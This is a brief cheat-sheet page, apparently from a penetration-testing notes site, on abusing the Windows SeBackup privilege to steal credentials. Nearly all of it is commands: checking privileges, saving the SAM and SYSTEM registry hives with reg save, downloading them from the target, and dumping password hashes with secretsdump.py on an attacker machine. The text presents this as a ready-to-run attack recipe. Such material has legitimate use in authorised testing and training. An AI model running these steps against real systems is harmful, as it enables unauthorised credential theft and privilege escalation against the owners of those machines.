SeBackup (with SeRestorePrivilege)
Sensitive files can be accessed (in combination with SeRestore privilege) with Built-in commands.
Check the site. https://github.com/gtworek/Priv2Admin/blob/master/SeBackupPrivilege.md Check SeRestorePrivilege if you need to enable the privilege.
SAM
# check privileges
> whoami /priv
# copy the sam and system files
> cd C:\
> mkdir temp
> cd C:\temp
> reg save hklm\sam c:\Temp\sam
> reg save hklm\system c:\Temp\system
# file trasnfer
> download sam
> download system
# dump sam secrets locally
Kali> secretsdump.py -sam sam -system system LOCALNTDS
Last updated